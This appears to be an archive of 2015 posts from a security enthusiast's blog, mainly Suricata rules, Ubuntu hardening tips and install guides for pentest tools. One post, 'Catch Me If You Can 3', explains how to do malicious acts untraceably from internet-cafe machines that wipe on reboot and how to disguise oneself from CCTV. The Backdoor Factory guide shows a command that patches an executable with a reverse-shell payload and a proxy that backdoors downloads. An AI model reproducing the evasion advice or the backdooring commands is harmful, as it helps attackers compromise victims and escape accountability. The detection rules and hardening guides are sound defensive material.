Monday, December 07, 2015

Facebook Don't Care About Their Users Again

Several years ago, a researcher found a vulnerability in Facebook and he informed the official and provided with the PoC in full details when asked. Later, the researcher was told that it was not vulnerable. The researcher then exploited the founder of Facebook account with the vulnerability that he found in order to alert the founder. However, the researcher could not get his bug bounty at the end and the vulnerability was fixed by Facebook then. Some Facebook users knowing that, they then funding the researcher themselves as they thought that the researcher need the reward.

Today, another researcher, teh3ck (Twitter @teh_h3ck) found a open-redirect vulnerability and Facebook has been informed. However, tech3ck was informed that "the security impact of this bug is not significant" and refused to pay the bug bounty. The following is the timeline of the bug report :

12th of Nov 2015 | Initial bug report
12th of Nov 2015 | Reply from FB bot that it is false positive
12th of Nov 2015 | Added more clarification for the bug
16th of Nov 2015 | Reply from facebook that they use a blacklist method on their next_uri
16th of Nov 2015 | Sent POC videos of the bug that show the impact of the vulnerability
18th of Nov 2015 | Reply from facebook that i am redirecting to a non blacklisted site
18th of Nov 2015 | Explaining why url blacklisting is not the solution for the specific bug
26th of Nov 2015 | Reply from fb that security impact of this bug is not significant.
6th of Dec 2015 | Public post of the bug

For details, please refer to Vag Mour site.

In conclusion, Facebook and her security team are suck again.

That's all! See you.

Update :

After teh3ck and this article posting several hours, Facebook fixed the vulnerability without giving teh3ck any bug bounty. My recommendation is not to report to Facebook if you find something else on it. You will never never never get the bug bounty for sure.


Tuesday, November 10, 2015

HOWTO : Quick Audit Your Android Devices

*** Google Play install is no longer supported by Google. The official site provides apk file download for installation. Make sure you enabled the "Unknown sources" at "Settings" -- "Security" before the install. ***

Recently, there are some famous vulnerabilities on Android devices from Android 4.x to 5.x as well as 6.x. Since not all the vendors of Android device will release the fixes, you can inspect your devices to see if they are vulnerable or not. If they are vulnerable, you can use it with care or change to other devices which have been fixed the vulnerabilities.

VTS for Android is an open source project which can scan for the following current vulnerabilities :

ZipBug9950697
Zip Bug 8219321 / Master keys
Zip Bug 9695860
Jar Bug 13678484 / Android FakeID
CVE 2013-6282 / put/get_user
CVE_2011_1149 / PSNueter / Ashmem Exploit
CVE_2014_3153 / Futex bug / Towelroot
CVE 2014-3847 / WeakSauce
StumpRoot
Stagefright bugs
x509 Serialization bug
PingPong root - CVE-2015-3636
Stagefright - CVE-2015-6602
Samsung Remote Code Execution as System
CVE-2015-6608
CVE-2015-7414
CVE-2015-1528
CVE-2015-6616

By the way, we should also beware of the adware too. Some adware can auto-root your Android devices and they are almost impossible to remove. For details, please refer to this article.

That's all! See you.


HOWTO : Audit Your Home Router

Recently, a lot of home routers have been compromised. However, vendors of home router will not disclose if the vulnerabilities have been fixed or not. If you are Android users and using wifi at home, you can audit your home router easily with RouterCheck which can be downloaded at Google Play.

This apps will check the router if the default username and password are in force or not. It will also check if your router has the known vulnerabilities or not.

It will not change any setting of your router but it has some information for you to improve the security of your router.

That's all! See you.


Monday, October 26, 2015

HOWTO : Detect and Prevent ICMP Tunnel Attack on Suricata

Recently, I read an article about ICMP Tunnel attack. It demo how to upload a file by encoding the content with Base64 via ICMP protocol.

There is a suricata rule for detecting large ICMP packet but it is disabled by default (dated Oct 26, 2015) currently, which is :

#alert icmp any any -> any any (msg:"GPL ICMP Large ICMP Packet"; dsize:>800; reference:arachnids,246; classtype:bad-unknown; sid:1000029; rev:5;)

We can enable it by removing the "#" in front of the rule and change it to "drop".

However, it cannot detect the packet that is encoded with Base64. I draft the following Suricata rule and make it to "drop" base on the previous rule :

drop icmp any any -> any any (msg:"LOCAL ICMP Large ICMP Packet (Base64)"; dsize:>800; content:"="; pcre:"/^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{4})$/"; reference:url,www.notsosecure.com/2015/10/15/icmp-tunnels-a-case-study/; classtype:bad-unknown; sid:1000028; rev:1;)

That's all! See you.


Thursday, October 22, 2015

HOWTO : Self-signed Certificate on Suricata

Problem

The most common weakness of Intrusion Detection and Prevention System is encrypted traffic inspection. The encrypted SSL/TLS traffic requires signed certificate for decryption. Some malicious activities may use self-signed certificate for the SSL/TLS connection.

Solution

How we can do that? If you are running Suricata as IPS, you can do it very easy with the reference of this blog. The rule will detect self-signed certificate without concerning of port number.

Make sure you have configure the Suricata properly according to the blog.

You can also use this rule for other purpose too.

Quick Reference

self-signed-cert.lua

The suricata rule is :

alert tls any any -> any any (msg:"SURICATA TLS Self Signed Certificate"; flow:established; luajit:self-signed-cert.lua; tls.store; classtype:protocol-command-decode; sid:999666111; rev:1;)

HOWTO : LuaJIT on Suricata

That's all! See you.


Thursday, October 15, 2015

HOWTO : Detect and Prevent SSH Tunnel On Suricata

Problem

The most common weakness of Intrusion Detection and Prevention System is encrypted traffic inspection. The SSH encrypted traffic requires private/public keys for encryption/decryption and it is very hard to obtain the private key from attackers.

Solution

How we can do that? If you are running Suricata as IPS, SSH Dynamic, Reverse and Port Forwarding tunnel will be detected by the following rules :

# ssh (port 5228=Google Talk, port 6697=IRC)
alert tcp any any -> any 22 (msg:"LOCAL SSH connect"; flow:established,to_server; app-layer-protocol:ssh; sid:1000008; rev:1;)

drop tcp any any -> any 22 (msg:"LOCAL not SSH but Port 22"; flow:established,to_server; app-layer-protocol:!ssh; sid:1000009; rev:1;)

drop tcp any any -> any ![22,5228,6697] (msg:"LOCAL SSH but not Port 22"; flow:established,to_server; app-layer-protocol:ssh; sid:1000010; rev:1;)


The first rule will alert you that there is a SSH connection to the port 22. The second rule will block the traffic the not SSH protocol but connect to port 22. The last rule will block the SSH connection that are not connecting to port 22, 5228 or 6697, where port 5228 is Google Talk and port 6697 is IRC.

If you do not use standard port 22 for SSH, please change the value when necessary.

Reference

SSH Brute Force and Suricata
Protocol Anomalies Detection

That's all! See you.


Wednesday, October 14, 2015

HOWTO : LuaJIT on Suricata

What is LuaJIT?

LuaJIT is a Just-In-Time Compiler (JIT) for the Lua programming language. Lua is a powerful, dynamic and light-weight programming language. It may be embedded or used as a general-purpose, stand-alone language.

LuaJIT can be used as scripting lauguage for Suricata detection rules. Emerging Threats creates some lua scripts for Suricata at here.

Lua is not enabled by default on Suricata. You need to re-compile it to make it works.

If you compile Suricata from GitHub, you can :

Compile and Install of LuaJIT :

The current version at the writing is 2.0.4.

cd ~
git clone http://luajit.org/git/luajit-2.0.git
cd luajit-2.0
make
sudo make install


Compile and Install of Suricata on Ubuntu 14.04.3 LTS :

cd ~
git clone git://phalanx.openinfosecfoundation.org/oisf.git
cd oisf
git clone https://github.com/ironbee/libhtp.git

./autogen.sh
./configure --prefix=/usr/ --sysconfdir=/etc/ --localstatedir=/var/ --enable-luajit \
--enable-geoip --with-libnss-libraries=/usr/lib --with-libnss-includes=/usr/include/nss/ \
--with-libnspr-libraries=/usr/lib --with-libnspr-includes=/usr/include/nspr \
--with-libcap_ng-libraries=/usr/local/lib --with-libcap_ng-includes=/usr/local/include \
--with-libluajit-includes=/usr/local/include/luajit-2.0/ \
--with-libluajit-libraries=/usr/local/lib/


make clean
make
sudo make install
sudo ldconfig


Works with ET Lua scripts :

# install lua related packages
sudo apt-get -y install cmake lua-zip lua-zip-dev lua-zlib lua-zlib-dev \
luarocks libzzip-dev libzzip-0.13 lua-apr lua-apr-dev lua-socket \
lua-socket-dev lua-sec lua-sec-dev lua-rex-gnu lua-rex-gnu-dev \
lua-rex-pcre lua-rex-pcre-dev lua-bitop lua-bitop-dev liblua5.1 \
libzip-dev

sudo apt-get -y install cmake build-essential

sudo luarocks install struct
sudo luarocks install bitlib

sudo cp /usr/lib/x86_64-linux-gnu/liblua5.1.so /usr/local/lib/liblua.so


# compile and install ltn12ce
cd ~
git clone https://github.com/mkottman/ltn12ce.git
cd ltn12ce
mkdir build && cd build
cmake ..
make
sudo make install
sudo mkdir -p /usr/local/lib/lua/5.1/ltn12ce
sudo cp ~/ltn12ce/build/src/ltn12ce/core.so /usr/local/lib/lua/5.1/ltn12ce


# compile and install zlib
cd ~
wget http://zlib.net/zlib-1.2.8.tar.gz
tar -xzvf zlib-1.2.8.tar.gz
cd zlib-1.2.8
./configure
make
sudo make install


# compile and install lua-zlib
cd ~
git clone https://github.com/brimworks/lua-zlib.git
cd lua-zlib
make linux
sudo mkdir -p /usr/lib/lua/5.1
sudo mkdir -p /usr/local/lib/lua/5.1
sudo cp zlib.so /usr/local/lib/lua/5.1
sudo make install

sudo cp /usr/lib/x86_64-linux-gnu/lua/5.1/zip.so /usr/local/lib/lua/5.1
sudo mkdir -p /usr/local/lib/lua/5.1/apr
sudo cp /usr/lib/x86_64-linux-gnu/lua/5.1/apr/core.so /usr/local/lib/lua/5.1/apr



Make sure the ET lua scripts and related rules are placed at "/etc/suricata/rules" and the "luajit-drop.rules" or "luajit.rules" is loaded in suricata.yaml.

Bug Fix on ET Lua scripts :

Please note that CVE-2015-1770.lua and CVE-2015-2375.lua have a small bug when using with luajit. You can fix them like this :

sudo sed -i -e 's/activeX%d+\\.xml/activeX%d+.xml/g' /etc/suricata/rules/CVE-2015-1770.lua
sudo sed -i -e 's/table%d+\\.xml/table%d+.xml/g' /etc/suricata/rules/CVE-2015-2375.lua


Finally, if you are using Snorby, you need to copy the all rules files (except lua scripts) to another place, such as "/etc/suricata/rules/snorby" for Snorby; otherwise, Snorby cannot display the rules when requested. Meanwhile, you need to edit "/var/www/snorby/config/snorby_config.yml" for the new rules path.

One more thing, the value of "prealloc" at "flow" section at suricata.yaml should not more than "4000000"; otherwise, the lua scripts cannot be loaded.

After that, restart Suricata.

That's all! See you.


Friday, October 09, 2015

HOWTO : ClamAV For Suricata

Suricata is an Intrusion Detection and Prevention System and it can work with ClamAV too. One of the features of Suricata is using MD5 hash with the file. We can use ClamAV signature MD5 hash for every file download inspection. We can also save the malicious file for further analysis.

Install and Configure of ClamAV

sudo apt-get update
sudo apt-get install clamav
sudo update-rc.d clamav-freshclam disable


We will not use ClamAV engine for Suricata but use ClamAV MD5 signature instead.

Prepare ClamAV MD5 Signature for Suricata

sudo nano /usr/bin/nsm_clamav_md5



sudo chmod +x /usr/bin/nsm_clamav_md5

Create cron job :

sudo crontab -e

0 03 * * * /usr/bin/nsm_clamav_md5


* The cron job will run the script (nsm_clamav_md5) at 0300 hours every day and it should be earlier than the Suricata rules update script/procedure.

Create your Suricata Local Rule

sudo nano /etc/suricata/rules/local.rules

Append the following to the file :

# rules for file extraction
# this rule drop all the file that matches the clamav md5 hash
drop http any any -> any any (msg:"LOCAL Malicious file - Clamav MD5 Hash"; flow:established; filestore; filemd5:blacklist_md5; classtype: suspicious-filename-detect; sid:1000000; rev:1;)


Configure suricata.yaml

sudo nano /etc/suricata/suricata.yaml

Make the following settings as the following :



* If you do not like to save the malicious file for further analysis, you can disable the "file-store" setting at suricata.yaml and remove the "filestore" keyword from the local.rules.

Make It To Work Together

sudo nsm_clamav_md5

Restart suricata or reboot the box. For Croissants, you can restart the Suricata by issuing the following command :

sudo restart suricata

The Suricata will block the malicious files from downloading when the MD5 hash is matched and the malicious files will be saved at /var/log/suricata/files for further inspection.

Known Issue

libhtp 0.5.x cannot handle the file download re-try with browser at the moment. It is recommended that all users should not re-try to download any file when it cannot be downloaded in the beginning. According to the developer of libhtp, 0.6.x can handle this problem.

Another limitation is that Suricata can detected the malicious files (MD5 hash) that known to ClamAV only.

Reference

Filemd5 and white or black listing with MD5 hashes

That's all! See you.


Sunday, October 04, 2015

Cloudflare Or Not Cloudflare?

Cloudflare is very famous in against DDoS attacks. Their by-product is the IP address of the protected sites are hidden if the owner of the protected sites are setting it correctly. However, it is not very easy to set it correctly when the owners do not fully understand well the services that Cloudflare is provided.

Many website owners choose to use Cloudflare services including criminals. There are a lot of methods to resolve the IP address of the websites that behind Cloudflare protection, such as CrimeFlare. Almost all these methods are targeted to the mis-configuration of Cloudflare. Some of the methods do not work as Cloudflare has been fixed the problem long time ago.

Recently, there is a new method to resolve the IP address of the websites that behind Cloudflare, that is Cloudflare IP resolver. However, if the webmaster or sysadmin is clever enough, this method is also failed.

No matter how, this new method is also a killer to Cloudflare for sure.

Finally, when you think that your system is very very secure, your system will be very danger.

That's all! See you.


Thursday, September 17, 2015

Will Linux Be Infected By Malware Or Not?

When I came to know Linux, almost all advanced Linux users told me that Linux is impossible to be infected by virus and malware due to its excellent design. Except root or sudoer, nobody has the privilege to do harm on the system including malware. In case your Linux is infected, only you (the user) is affected. Therefore, you are not required to install any anti-virus or anti-malware application on Linux system. Meanwhile, Linux will not infected Windows based malware. Moreover, Linux developers tried to harden the Linux kernel in many ways, such as ASLR, XD/NX, SELinux, Apparmor, and Gentoo's harden-kernel, etc.

After being an Information Security Enthusiast, I recognized that it is totally not true. In my opinion, Linux just like any other operating systems that can be infected by malware and the interference is not limited to your system only. There are many such news recently.

Linux users can be infected with malware in many ways and some malware are cross-platform software too. The most common way to be infected malware is by surfing internet with your browsers. The other most common way is not keeping your Linux system up-to-date. For example, the very famous Heartbleed vulnerability is still vulnerable for over 200,000 devices in the world after more than a year.

Once you are infected, the malware can perform privilege escalation on your Linux system to gain the rights of root. How this to be done? The most common one is vulnerability of the kernel and/or application software. The other is by social engineering. The most insecure part is human being anyway.

Furthermore, most modern Linux distributions implied sudoer. Sudoer has the rights of root. However, most sysadmins or users will set their account name and password in a very weak way. In addition, the password of root can be easily guessed in most cases for those distributions that not using sudoer. I just name some of them here and there are many ways to get root privilege on Linux systems, for example, misconfiguration of Linux system and/or application software.

Hereby, I name some software, skills and tools as well as technologies on Linux malware for your reference. Hope you all understand that Linux is not a bullet-proof system. It is very easy to break for sure. Finally, I would like to introduce how I hardening Ubuntu for my current daily use, here you are.

Open Source Anti Linux Malware

Linux Malware Detect

ClamAV

Linux Forensics and Linux Malware Analysis

REMnux: A Linux Toolkit for Reverse-Engineering and Analyzing Malware

Linux and Disk Forensics

Books for Linux Malware Analysis and Forensics

Malware Forensics Field Guide for Linux Systems: Digital Forensics Field Guides

Linux Forensics

Reference

Don’t believe these four myths about Linux security

Wiki - Linux malware

Wiki - Address Space Layout Randomization (ASLR)

Wiki - Social Engineering


That's all! See you.


HOWTO : ArpON on Ubuntu 14.04 LTS

ArpON (ARP handler inspection) is a portable handler daemon that make ARP protocol secure in order to avoid the Man In The Middle (MITM) attack through ARP Spoofing, ARP Cache Poisoning or ARP Poison Routing (APR) attacks. It blocks also the derived attacks by it, which Sniffing, Hijacking, Injection, Filtering & co attacks for more complex derived attacks, as: DNS Spoofing, WEB Spoofing, Session Hijacking and SSL/TLS Hijacking & co attacks.

Step 1 :

sudo apt-get update
sudo apt-get install arpon


Step 2 :

sudo nano /etc/default/arpon

Uncomment the DARPI and RUN, makes it looking as :

DAEMON_OPTS="-q -f /var/log/arpon/arpon.log -g -d"
RUN="yes"

Step 3 :

sudo /etc/init.d/arpon restart

That's all! See you.


Wednesday, September 16, 2015

HOWTO : Hardening and Tuning Ubuntu 14.04 LTS

This guide will lead you to hardening and tuning your Ubuntu 14.04 in a few steps without any expense. As an Information Security Enthusiast, my Ubuntu box is setting up like the following and I use the box every day.

kernel Hardening and Tuning

Make sure you enabled the "No Execute (NX)" or "Execute Disable (XD)" in the BIOS/UEFI.

sudo nano sysctl.conf

To make it looks like the following :



To reload it :

sudo sysctl -p

ARP Spoofing

One of the common attacks is Man In The Middle attack. It can use with browser attack too. This guide will help to protect your Ubuntu from being spoofing. Meanwhile, make sure to set ARP related settings in your router if the feature is available. Most home routers have no such feature.

HOWTO : ArpON on Ubuntu 14.04 LTS

Anti-Malware

Most Linux users (including advanced users) misunderstand that Linux will never and impossible to infect with malware. However, it is not ture. Almost all operating systems are similar to the threats.

HOWTO : ClamAV on Ubuntu 14.04 LTS

This guide will lead you to set up ClamAV for "Scan On Access" instead of "Scan On Demand".

Network Interface Tuning

sudo nano /etc/rc.local

Insert the following before "exit 0" :

/sbin/ifconfig eth0 txqueuelen 10000
/sbin/ifconfig wlan0 txqueuelen 10000


* make sure your NICs are "eth0" and "wlan0" or else

Storage Performance Tuning

(A) SSD

Verify TRIM is supported :

sudo hdparm -I /dev/sda | grep TRIM

If the output is similar to the below which is supported :

* Data Set Management TRIM supported (limit 1 block)

If you install your Ubuntu in LVM, the TRIM is usually enabled by default. You can confirm it :

cat /etc/lvm/lvm.conf | grep issue_discards

If the output is similar to the below which is enabled :

issue_discards = 1

Then set the following to "deadline" if it is not done yet.

cat /sys/block/sda/queue/scheduler

noop [deadline] cfq

If not, set it :

sudo nano /etc/rc.local

Insert the following before "exit 0" :

echo 1024 > /sys/block/sda/queue/read_ahead_kb
echo 1024 > /sys/block/sda/queue/nr_requests
echo deadline > /sys/block/sda/queue/scheduler


* make sure your device is sda (or sdb ...)

To reload it or reboot your system :

sudo /etc/rc.local

After that, you need to edit the partition table :

To make it looks like the following :

/dev/mapper/ubuntu--vg-root / ext4 noatime,nodiratime,norelatime,errors=remount-ro 0 1

sudo mount -a
sudo mount -o remount /


If you have an error after running the captioned commands, DO NOT reboot your system. You should correct the typo before doing so; otherwise, you cannot boot to your system again.

You can add "scsi_mod.use_blk_mq=1" to kernel parameter, such as "/etc/default/grub".

(B) Hard Drive

sudo nano /etc/rc.local

Insert the following before "exit 0" :

echo 1024 > /sys/block/sda/queue/read_ahead_kb
echo 1024 > /sys/block/sda/queue/nr_requests


* make sure your device is sda (or sdb ...)

To reload it or reboot your system :

sudo /etc/rc.local

After that, you need to edit the partition table :

To make it looks like the following :

ext4 noatime,nodiratime,norelatime,errors=remount-ro 0 1

sudo mount -a
sudo mount -o remount /


If you have an error after running the captioned commands, DO NOT reboot your system. You should correct the typo before doing so; otherwise, you cannot boot to your system again.

Firefox Hardening and Tuning

Most malicious attacks nowadays are via browsers. Therefore, we need to protect ourselves even we are using Linux.

(A) Apparmor For Firefox

AppArmor is a Linux Security Module implementation of name-based access controls.

sudo apt-get update
sudo apt-get install apparmor-utils apparmor-profiles


To make it looks like the following :



sudo rm /etc/apparmor.d/disable/usr.bin.firefox

Reload the rules :

sudo apparmor_parser -r /etc/apparmor.d/usr.bin.firefox

(B) Firefox Add-ons

NoScript

Allow active content to run only from sites you trust, and protect yourself against XSS and Clickjacking attacks.

* You are not required to enable it as it will block the javascript that most modern websites are using. You need to disable it globally to make the XSS attack protection by default.

uBlock Origin

Finally, an efficient blocker. Easy on CPU and memory. (Please refer to the official site for details)

Cyscon Security Shield

Enjoy enhanced protection from phishing threats and malicious sites while browsing the Internet.

WebRTC Control

Have control over WebRTC (disable or enable) and protect your IP address.

BetterPrivacy

Remove or manage a new and uncommon kind of cookies, better known as LSO's.The BetterPrivacy safeguard offers various ways to handle Flash-cookies set by Google, YouTube, Ebay and others...

HTTPS Everywhere

Encrypt the web! HTTPS Everywhere is a Firefox extension to protect your communications by enabling HTTPS encryption automatically on sites that are known to support it, even when you type URLs or follow links that omit the https: prefix.

Speed Tweaks (SpeedyFox)

This extension provides a list to almost all the settings that you may need to alter in order to enhance Firefox's speed.

ZenMate Security and Privacy VPN

ZenMate secures your browsing with encryption - protecting you from hackers, snoopers and data thieves who prey on unsecure connections.

(C) Optional

(1) Firefox Add-ons :

User-Agent Switcher

The User Agent Switcher extension adds a menu and a toolbar button to switch the user agent of a browser.

Youtube High Definition

YouTube High Definition is a powerful tool that will let you automatically play all YouTube videos in HD (High Definition), turn off annotations, change video player size, auto stop videos, auto mute videos, control embedded videos and much more.

Youtube Flash-Html5

Play YouTube Videos in Flash or HTML5 Player.

(2) Browse with "New Private Window" feature

Finally, you may consider to use Intrusion Detection and Prevention System (IDPS) to protect your network. My project "Croissants" which is an IDPS that can deploy to your network (in front or/and behind the router). Or, you may also consider to use TOR to protect your privacy with my project "NightHawk".

Reference

WebRTC IPS

IP Leak

That's all! See you.


Tuesday, September 08, 2015

HOWTO : ClamAV on Ubuntu 14.04 LTS

Clam AntiVirus (ClamAV) is a free and open-source, cross-platform antivirus software tool-kit able to detect many types of malicious software, including viruses.

This guide will lead you to set up ClamAV for "Scan On Access" instead of "Scan On Demand". It is also target to Desktop usage only.

The current version at this writing is ClamAV 0.98.7+dfsg.

Step 1 :

sudo apt-get install clamav clamav-freshclam clamav-daemon libclamunrar6

Step 2 :

sudo nano /etc/clamav/clamd.conf

To make the entries looking like the following. Make sure to replace "samiux" with your username.



cd ~
mkdir quarantine


Step 3 :

sudo nano /etc/clamav/freshclam.conf

To make the entries looking like the following.



sudo freshclam

Step 4 :

sudo nano /etc/apparmor.d/usr.sbin.clamd

To make the entries looking like the following.



After that, execute the following command to reload the apparmor rules.

sudo apparmor_parser -r /etc/apparmor.d/usr.sbin.clamd

Remark :

Download or copy will not trigger the ClamAV scan but browsing or executing (or etc) will. If any malware or virus (no matter it is for Windows, Linux or Mac OSX) is detected, it will be moved to "quarantine" directory. You can also check the log at "/var/log/clamav/clamav.log".

Testing :

You can install NO harm virus testing files for testing.

sudo apt-get install clamav-testfiles

The NO harm virus testing files are located at "/usr/share/clamav-testfiles".

Reference

AppArmor Wiki

See also : Fireclam Firefox Add-ons

That's all! See you.


Saturday, August 29, 2015

HOWTO : Commix on Ubuntu 14.04 LTS

Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and it can be used, from web developers, penetration testers or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in Python programming language.


Install

sudo apt-get install git

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/stasinopoulos/commix.git
cd commix
python commix.py -h



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/commix
python commix.py --update



Reference

Wiki


That's all! See you.


HOWTO : HconSTF on Ubuntu 14.04

Hcon Security Testing Framework (HconSTF) is Web Application Security Analysis & Penetration Testing Framework made of mozilla technologies.

Most of the part of HconSTF is semi-automated but you still need your brain to work it out. It can be use in all kind of security testing stages, it has tools for conducting tasks like,

- Web Penetration Testing
- Web Exploits Development
- Web Malware Analysis
- Open Source Intelligence ( Cyber Spying & Doxing )


Install

cd ~
mkdir arsenal
cd arsenal


For x86_64 system :

wget http://sourceforge.net/projects/hconframework/files/HconFramework-Fire/HconSTF_0.5_Prime/HconSTF_v0.5_Prime_Linux_x64.tar.bz2
tar -jxvf HconSTF_v0.5_Prime_Linux_x64.tar.bz2
cd HconSTF
sudo ./HconSTF


For x86 system :

wget http://sourceforge.net/projects/hconframework/files/HconFramework-Fire/HconSTF_0.5_Prime/HconSTF_v0.5_Linux_x86.tar.bz2
tar -jxvf HconSTF_v0.5_Linux_x86.tar.bz2
cd HconSTF
sudo ./HconSTF



Update/Upgrade

rm -R ~/arsenal/HconSTF

Go to the official site to download the latest version and repeat the Install procedure.


Reference

User Manual (PDF)


That's all! See you.


HOWTO : PTF on Ubuntu 14.04 LTS

The PenTesters Framework (PTF) is a Python script designed for Debian/Ubuntu based distributions to create a similar and familiar distribution for Penetration Testing. As pentesters, we've been accustom to the /pentest/ directories or our own toolsets that we want to keep up-to-date all of the time. We have those "go to" tools that we use on a regular basis, and using the latest and greatest is important.

PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is cohesive to the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used. PTF simplifies installation and packaging and creates an entire pentest framework for you. Since this is a framework, you can configure and add as you see fit. We commonly see internally developed repos that you can use as well as part of this framework. It's all up to you.

The ultimate goal is for community support on this project. We want new tools added to the github repository. Submit your modules. It's super simple to configure and add them and only takes a few minute.


Install


sudo apt-get install git

cd ~
git clone https://github.com/trustedsec/ptf.git
cd ptf
sudo ./ptf


If you want to install and/or update everything :

use modules/install_update_all
run



All the modules (pentesting tools) are installed at /pentest directory. Please note that WINE and i386 dependencies will be installed accordingly.


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

PTF will try to update itself on every start up. Meanwhile, you can run PTF at any directory after the first run.

If you want to update everything :

sudo ptf
use modules/install_update_all
run



Reference

Video

Documentation


That's all! See you.


Friday, August 28, 2015

Catch Me If You Can 3

Last year, I was talking about how to use NightHawk to do malicious things. The full article is here. Two years ago, I also talked about using pre-paid SIM card to do malicious things and the full article is here. However, you think that it would be a chance to be caught as TOR network exit nodes may be monitoring by law enforcements. Meanwhile, identity registration may be needed to purchase SIM card in your country. Okay, today I will introduce another method that you can use wired network to do malicious things untraceable.

In my country, there are many "Internet Cafe" which have a pool of computer systems that running Windows system to provide network gaming or internet services to their customers with a cheap price per hour. Those computer systems will be equipped "Reborn Card" which can reset to its default setting on every reboot. Normally, the "Internet Cafe" will reboot their computer systems every day.

You can hire a computer system in the "Internet Cafe", reboot it. Plug in your Kali Linux or BackBox Linux Live USB (or your custom made pentesting Linux Live USB). Personally, I will recommend BackBox as it will have some outstanding features, such as memory wiper.

After your malicious tasks, you can reboot your computer system and it will reset to its default setting. Normally, no data or activiities will be logged in the computer system.

When law enforcements trace your IP address which will direct them to the "Internet Cafe", they cannot obtain any evidence from the computer pool as those systems are reborned!

Finally, beware that CCTV will be installed in the "Internet Cafe" or nearby shops which will capture your present. You may need to do some "make up" when necessary.

That's all! See you.

See Also

Catch Me If You Can
Catch Me If You Can 2
Catch Me If You Can 4

HOWTO : OpenVAS on Ubuntu 14.04 LTS

OpenVAS is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution.


Install

To install OpenVAS 8 on Ubuntu 14.04 LTS :

sudo add-apt-repository ppa:mrazavi/openvas

sudo apt-get update
sudo apt-get install xsltproc sqlite3 openvas

sudo openvas-nvt-sync
sudo openvas-scapdata-sync
sudo openvas-certdata-sync

sudo service openvas-scanner restart
sudo service openvas-manager restart
sudo openvasmd --rebuild --progress


To run it :

Open browser to point to https://localhost:443

* username and password are both "admin"


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

sudo openvas-nvt-sync
sudo openvas-scapdata-sync
sudo openvas-certdata-sync

sudo service openvas-scanner restart
sudo service openvas-manager restart
sudo openvasmd --rebuild --progress



Reference

You can disable OpenVAS auto startup on every boot and start it manually. Please note that if OpenVAS is running, shutdown process will take time.

For example :

sudo update-rc.d openvas-scanner disable
sudo update-rc.d openvas-manager disable


To start up manually :

sudo service openvas-scanner start
sudo service openvas-manager start


To stop manually :

sudo service openvas-scanner stop
sudo service openvas-manager stop



That's all! See you.


HOWTO : the-backdoor-factory on Ubuntu 14.04 LTS

The Backdoor Factory (BDF) is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.


Install

sudo apt-get install git python-pip build-essential

Install BDFactory :

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/secretsquirrel/the-backdoor-factory.git
cd the-backdoor-factory
sudo pip install capstone
sudo ./install.sh


How to run it :

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp

Install BDFProxy :

cd ~/arsenal
git clone https://github.com/secretsquirrel/BDFProxy.git
cd BDFProxy
sudo ./install.sh


How to run it :

nano bdfproxy.cfg

*change the settings when necessary

./bdf_proxy.py

msfconsole -r bdfproxy_msf_resource.rc



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/the-backdoor-factory
sudo ./update.sh

cd ~/arsenal/BDFProxy
sudo ./update.sh



Reference

See also : Metaspolit Framework


That's all! See you.


HOWTO : SPIKE on Ubuntu 14.04 LTS

SPIKE is a fuzzer to find exploitable bugs on application programs.


Install

sudo apt-get install build-essential

cd ~
mkdir arsenal
cd arsenal
wget http://www.immunitysec.com/downloads/SPIKE2.9.tgz
tar -xzvf SPIKE2.9.tgz
cd SPIKE/src
./configure
make



* For how to use it, please refer to the links at "Reference" below.


Update/Upgrade

Nil


Reference

An Introduction to Fuzzing: Using fuzzers (SPIKE) to find vulnerabilities

Fuzzer Automation with SPIKE


* Or, read the documents at ~/arsenal/SPIKE/SPIKE/documentations


That's all! See you.


HOWTO : MACchanger on Ubuntu 14.04 LTS

A GNU/Linux utility for viewing/manipulating the MAC address of network interfaces.


Install

sudo apt-get install macchanger

macchanger -h



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade



Reference

Nil


That's all! See you.


HOWTO : edb-debugger on Ubuntu 14.04 LTS

edb is a cross platform x86/x86-64 debugger. It was inspired by Ollydbg, but aims to function on x86 and x86-64 as well as multiple OS's. Linux is the only officially supported platform at the moment, but FreeBSD, OpenBSD, OSX and Windows ports are underway with varying degrees of functionality.


Install

sudo apt-get install git build-essential libboost1.55-all-dev qt5-default libqt5xmlpatterns5-dev

cd ~
mkdir arsenal
cd arsenal
git clone --recursive https://github.com/eteran/edb-debugger.git
cd edb-debugger
./travis_install_capstone.sh
qmake
make
sudo make install
cd ~
mkdir .edb
sed -i -e 's/directory.session.path=/directory.session.path=\/home\/$USER\/.edb/g' ~/.config/codef00.com/edb.conf
sed -i -e 's/directory.symbol.path=/directory.symbol.path=\/home\/$USER\/.edb/g' ~/.config/codef00.com/edb.conf
edb



*** Thanks for Vladimir Stupnikov pointed out the installation error. ***


Update/Upgrade

cd ~/arsenal
rm -R edb-debugger


Repeat the Install procedure as previous mentioned.


Reference

Wiki


That's all! See you.


Thursday, August 27, 2015

HOWTO : Arachni on Ubuntu 14.04 LTS

Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.

It is smart, it trains itself by monitoring and learning from the web application's behavior during the scan process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify (or avoid) false-positives.

Unlike other scanners, it takes into account the dynamic nature of web applications, can detect changes caused while travelling through the paths of a web application’s cyclomatic complexity and is able to adjust itself accordingly. This way, attack/input vectors that would otherwise be undetectable by non-humans can be handled seamlessly.

